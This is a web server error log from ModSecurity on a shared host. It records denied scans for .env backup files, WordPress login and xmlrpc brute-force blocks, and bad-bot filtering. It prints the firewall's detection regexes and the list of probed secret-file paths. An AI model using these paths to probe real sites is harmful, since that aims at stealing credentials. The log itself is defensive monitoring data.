[Tue May 26 14:26:46.948869 2026] [security2:error] [pid 610693:tid 610850] [client 208.84.101.154:50034] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.old"] [unique_id "ahVgTjvNO3hpmlY6M8RhVwAAABs"]
[Tue May 26 14:26:46.949722 2026] [security2:error] [pid 610693:tid 610950] [client 208.84.101.154:50028] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.bak"] [unique_id "ahVgTjvNO3hpmlY6M8RhWQAAAH8"]
[Tue May 26 14:26:46.949885 2026] [security2:error] [pid 610693:tid 610934] [client 208.84.101.154:50144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.local~"] [unique_id "ahVgTjvNO3hpmlY6M8RhTwAAAG8"]
[Tue May 26 14:26:46.949999 2026] [security2:error] [pid 610693:tid 610866] [client 208.84.101.154:50126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.local.bak"] [unique_id "ahVgTjvNO3hpmlY6M8RhVAAAACs"]
[Tue May 26 14:26:46.950961 2026] [security2:error] [pid 610693:tid 610855] [client 208.84.101.154:50066] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env~"] [unique_id "ahVgTjvNO3hpmlY6M8RhXAAAACA"]
[Tue May 26 14:26:46.951887 2026] [security2:error] [pid 610693:tid 610916] [client 208.84.101.154:50146] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.local.swp"] [unique_id "ahVgTjvNO3hpmlY6M8RhTgAAAF0"]
[Tue May 26 14:26:46.953019 2026] [security2:error] [pid 606909:tid 607136] [client 208.84.101.154:50130] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.local.old"] [unique_id "ahVgTl0yRtX9qA7aVUVpBgAAAOY"]
[Tue May 26 14:26:46.953834 2026] [security2:error] [pid 610693:tid 610861] [client 208.84.101.154:50170] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.production.backup"] [unique_id "ahVgTjvNO3hpmlY6M8RhTQAAACY"]
[Tue May 26 14:26:46.954640 2026] [security2:error] [pid 606909:tid 607076] [client 208.84.101.154:3958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.backup"] [unique_id "ahVgTl0yRtX9qA7aVUVpBwAAAKo"]
[Tue May 26 14:26:47.424407 2026] [autoindex:error] [pid 606909:tid 607081] [client 145.220.91.19:54718] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:26:48.958710 2026] [security2:error] [pid 606909:tid 607134] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgUF0yRtX9qA7aVUVpKAAAAOQ"]
[Tue May 26 14:26:50.316888 2026] [security2:error] [pid 606909:tid 607119] [client 202.141.83.254:53874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgUl0yRtX9qA7aVUVpQAAAANU"]
[Tue May 26 14:26:50.317017 2026] [security2:error] [pid 606909:tid 607119] [client 202.141.83.254:53874] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgUl0yRtX9qA7aVUVpQAAAANU"]
[Tue May 26 14:26:50.484876 2026] [core:crit] [pid 610693:tid 610903] (13)Permission denied: [client 52.167.144.210:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:50.577319 2026] [core:crit] [pid 606909:tid 607152] (13)Permission denied: [client 52.167.144.210:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:50.750434 2026] [autoindex:error] [pid 610693:tid 610866] [client 208.84.101.154:50224] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:26:50.855019 2026] [security2:error] [pid 606909:tid 607092] [client 154.161.32.97:46535] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVgUl0yRtX9qA7aVUVpPwAAALo"]
[Tue May 26 14:26:51.146245 2026] [security2:error] [pid 610693:tid 610934] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgUjvNO3hpmlY6M8RhfQAAAG8"]
[Tue May 26 14:26:54.769171 2026] [security2:error] [pid 610693:tid 610895] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgVjvNO3hpmlY6M8RhowAAAEg"]
[Tue May 26 14:26:54.957215 2026] [security2:error] [pid 610693:tid 610886] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgVjvNO3hpmlY6M8RhqgAAAD8"]
[Tue May 26 14:26:55.189294 2026] [security2:error] [pid 610693:tid 610858] [client 74.7.230.60:54264] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVgVjvNO3hpmlY6M8RhpQAAI2c"]
[Tue May 26 14:26:55.189332 2026] [security2:error] [pid 610693:tid 610858] [client 74.7.230.60:54264] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVgVjvNO3hpmlY6M8RhpQAAI2c"]
[Tue May 26 14:26:55.856885 2026] [security2:error] [pid 606909:tid 606925] [remote 193.42.61.12:55298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVgV10yRtX9qA7aVUVpeQABAQ8"]
[Tue May 26 14:26:55.928846 2026] [core:crit] [pid 610693:tid 610860] (13)Permission denied: [client 157.55.39.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:56.170549 2026] [security2:error] [pid 610693:tid 610911] [client 74.7.230.60:54278] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVgVzvNO3hpmlY6M8RhzwAAWH0"], referer: https://www.yatirimfinans.cagmedya.com/robots.txt
[Tue May 26 14:26:56.668744 2026] [security2:error] [pid 606909:tid 607080] [client 34.7.53.211:55882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVgWF0yRtX9qA7aVUVpfwAAAK4"]
[Tue May 26 14:26:57.602128 2026] [core:crit] [pid 606909:tid 607086] (13)Permission denied: [client 157.55.39.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:57.651385 2026] [security2:error] [pid 610693:tid 610833] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgWTvNO3hpmlY6M8Rh4wAAAAo"]
[Tue May 26 14:26:58.782348 2026] [security2:error] [pid 610693:tid 610890] [client 45.132.227.225:57399] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVgWDvNO3hpmlY6M8Rh2QAAAEM"]
[Tue May 26 14:26:59.431053 2026] [security2:error] [pid 606909:tid 607075] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgW10yRtX9qA7aVUVppAAAAKk"]
[Tue May 26 14:27:00.723321 2026] [security2:error] [pid 606909:tid 607124] [client 202.141.83.254:53828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgXF0yRtX9qA7aVUVpxAAAANo"]
[Tue May 26 14:27:00.723453 2026] [security2:error] [pid 606909:tid 607124] [client 202.141.83.254:53828] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgXF0yRtX9qA7aVUVpxAAAANo"]
[Tue May 26 14:27:01.538047 2026] [security2:error] [pid 610693:tid 610879] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgXTvNO3hpmlY6M8RiEAAAADg"]
[Tue May 26 14:27:01.727867 2026] [security2:error] [pid 606909:tid 607077] [client 14.183.250.238:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgXV0yRtX9qA7aVUVp1QAAAKs"]
[Tue May 26 14:27:03.565531 2026] [security2:error] [pid 606909:tid 607144] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgX10yRtX9qA7aVUVp7QAAAO4"]
[Tue May 26 14:27:04.549488 2026] [security2:error] [pid 610693:tid 610928] [client 85.208.96.202:38216] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVgYDvNO3hpmlY6M8RiQwAAAGk"]
[Tue May 26 14:27:04.549720 2026] [security2:error] [pid 610693:tid 610928] [client 85.208.96.202:38216] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVgYDvNO3hpmlY6M8RiQwAAAGk"]
[Tue May 26 14:27:05.707111 2026] [security2:error] [pid 606909:tid 607079] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgYV0yRtX9qA7aVUVqBQAAAK0"]
[Tue May 26 14:27:06.990010 2026] [security2:error] [pid 610693:tid 610884] [client 34.90.191.83:32768] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "www.wego.onesoft.in"] [uri "/"] [unique_id "ahVgYjvNO3hpmlY6M8RiZAAAAD0"]
[Tue May 26 14:27:06.990120 2026] [security2:error] [pid 610693:tid 610884] [client 34.90.191.83:32768] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.wego.onesoft.in"] [uri "/"] [unique_id "ahVgYjvNO3hpmlY6M8RiZAAAAD0"]
[Tue May 26 14:27:07.310974 2026] [security2:error] [pid 610693:tid 610711] [remote 91.134.89.60:58984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVgYzvNO3hpmlY6M8RiZQAACBE"]
[Tue May 26 14:27:07.720538 2026] [security2:error] [pid 610693:tid 610712] [remote 112.196.0.228:57380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.0.196.112.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVgYzvNO3hpmlY6M8RicwAAIhI"]
[Tue May 26 14:27:07.899437 2026] [security2:error] [pid 606909:tid 607154] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgY10yRtX9qA7aVUVqFQAAAPg"]
[Tue May 26 14:27:09.926755 2026] [security2:error] [pid 610693:tid 610933] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgZTvNO3hpmlY6M8RikgAAAG4"]
[Tue May 26 14:27:11.300583 2026] [security2:error] [pid 610693:tid 610937] [client 202.141.83.254:19925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgZzvNO3hpmlY6M8RiqAAAAHI"]
[Tue May 26 14:27:11.300753 2026] [security2:error] [pid 610693:tid 610937] [client 202.141.83.254:19925] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgZzvNO3hpmlY6M8RiqAAAAHI"]
[Tue May 26 14:27:11.411705 2026] [security2:error] [pid 606909:tid 606968] [remote 167.99.5.1:39816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.5.99.167.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVgZ10yRtX9qA7aVUVqPQAAsjo"]
[Tue May 26 14:27:11.782533 2026] [security2:error] [pid 610693:tid 610914] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgZzvNO3hpmlY6M8RirAAAAFs"]
[Tue May 26 14:27:13.915965 2026] [security2:error] [pid 610693:tid 610928] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgaTvNO3hpmlY6M8RiyQAAAGk"]
[Tue May 26 14:27:15.276160 2026] [core:crit] [pid 610693:tid 610915] (13)Permission denied: [client 52.167.144.166:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:27:15.455388 2026] [core:crit] [pid 610693:tid 610845] (13)Permission denied: [client 52.167.144.166:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:27:15.894552 2026] [security2:error] [pid 606909:tid 607099] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVga10yRtX9qA7aVUVqbgAAAME"]
[Tue May 26 14:27:17.096339 2026] [autoindex:error] [pid 610693:tid 610861] [client 68.183.224.77:54258] AH01276: Cannot serve directory /home1/moesartc/public_html/poonawallatennisacademy.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 14:27:17.468477 2026] [security2:error] [pid 610693:tid 610875] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgbTvNO3hpmlY6M8RjDQAAADQ"]
[Tue May 26 14:27:20.059384 2026] [security2:error] [pid 606909:tid 607127] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgb10yRtX9qA7aVUVqpQAAAN0"]
[Tue May 26 14:27:21.648963 2026] [security2:error] [pid 610693:tid 610924] [client 202.141.83.254:19959] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgcTvNO3hpmlY6M8RjWgAAAGU"]
[Tue May 26 14:27:21.649071 2026] [security2:error] [pid 610693:tid 610924] [client 202.141.83.254:19959] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgcTvNO3hpmlY6M8RjWgAAAGU"]
[Tue May 26 14:27:22.146142 2026] [security2:error] [pid 606909:tid 607129] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgcV0yRtX9qA7aVUVqswAAAN8"]
[Tue May 26 14:27:23.646354 2026] [security2:error] [pid 610693:tid 610948] [client 44.194.98.103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVgczvNO3hpmlY6M8RjeQAAAH0"]
[Tue May 26 14:27:24.289390 2026] [security2:error] [pid 610693:tid 610928] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgczvNO3hpmlY6M8RjhAAAAGk"]
[Tue May 26 14:27:24.771749 2026] [security2:error] [pid 610693:tid 610892] [client 74.7.244.28:38810] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "pgcsi.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVgdDvNO3hpmlY6M8RjkgAARQg"]
[Tue May 26 14:27:25.313648 2026] [security2:error] [pid 610693:tid 610936] [client 14.239.71.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgdDvNO3hpmlY6M8RjlAAAAHE"]
[Tue May 26 14:27:26.300329 2026] [security2:error] [pid 606909:tid 607045] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgdV0yRtX9qA7aVUVq9QAAAIs"]
[Tue May 26 14:27:27.389055 2026] [autoindex:error] [pid 606909:tid 607064] [client 104.168.28.15:39670] AH01276: Cannot serve directory /home2/glorolle/public_html/zeexo/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:27:27.852515 2026] [security2:error] [pid 606909:tid 607157] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgd10yRtX9qA7aVUVrEQAAAPs"]
